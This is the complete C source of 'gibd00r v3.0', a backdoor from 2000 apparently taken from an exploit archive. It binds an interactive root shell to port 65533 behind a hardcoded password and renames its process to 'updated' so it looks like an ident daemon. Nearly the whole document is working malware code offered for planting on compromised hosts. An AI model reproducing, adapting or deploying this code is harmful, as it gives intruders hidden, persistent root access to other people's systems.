gibd00r3.c is a passworded backdoor which pretends to be an ident daemon.
7b6db7e36e91a54f7173f857cc6b40ffcb38c863277fe0fb28b5d164b0d398fd
/*
* gibd00r v3.0
* By axess ( axess@mail.com ) in Mar-2000
* Buffer0verfl0w Security www.b0f.com
*
* Compile : gcc gibd00r.c -o gibd00r -Wall
*
* Usage: ./gibd00r3 to just put it up or
* ./gibd00r3 & to put it in the background.
*
* This binds a shell to a port, by default we use.
* port == 65533
* passwd == d00r
* ps == updated
*
* We use passwd cause we dont want other ppl using it.
* You will not even get promphed for anything.
* Looks like an ident port.
* If passwd is wrong you will be disconnected.
* Backdoors like this usually makes you use ; after every command.
* But i think that sucks, so i use normal commands in this one.
*
*
* History: 1.0 28/7 -1999
* 2.0 9/11 -1999
*/
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <strings.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <signal.h>
#include <unistd.h>
void banner()
{
printf("\n\n gibd00r3.0 \n");
printf(" By axess Mar-2000 \n");
printf(" \n");
printf(" Ready for connections!! \n");
printf(" \n");
}
int main(int argc, char *argv[])
{
#define TRUE -1
struct sockaddr_in local;
struct sockaddr_in remote;
int s,r,size;
int login(int buffer);
strcpy(argv[0], "updated");
signal(SIGCHLD, SIG_IGN);
size = sizeof(struct sockaddr_in);
if(getuid () != 0)
{
printf ("\n You should use this as r00t. \n");
printf (" Come back when you are. \n\n");
exit(1);
}
banner();
local.sin_family = AF_INET;
local.sin_port = htons(65533);
local.sin_addr.s_addr = INADDR_ANY;
if((s=socket(AF_INET, SOCK_STREAM, 0)) == 1)
{
perror("Socket");
exit(1);
}
if(bind(s, (struct sockaddr *)&local, sizeof(struct sockaddr)) == TRUE)
{
perror("Port");
exit(1);
}
if(listen(s, 5) == TRUE)
{
perror("Listen");
exit(1);
}
for(;;)
{
if((r=accept(s, (struct sockaddr *)&remote, &size)) == TRUE)
{
perror("accept");
exit(1);
}
if(!fork())
{
if(login(r) == 0)
{
close(r);
exit(1);
}
close(0);
close(1);
close(2);
dup2(r,0);
dup2(r,1);
puts(" ");
puts("Welcome to gibd00r3.0");
puts(" By axess Mar-2000 ");
puts(" ");
puts(" You are now r00t. ");
puts(" Have phun.. ");
puts(" ");
execl("/bin/sh","/bin/sh","-i",(char *)0);
close(r);
exit(0);
}
close(r);
}
}
int login(int buffer)
{
char passwd[5];
int teck;
recv(buffer,passwd,5,0);
for(teck=0 ; teck<5 ; teck++)
{
if(passwd[teck] == '\r')
passwd[teck] = '\0';
}
if(strcmp("d00r", passwd) == 0)
return(1);
else
return(0);
}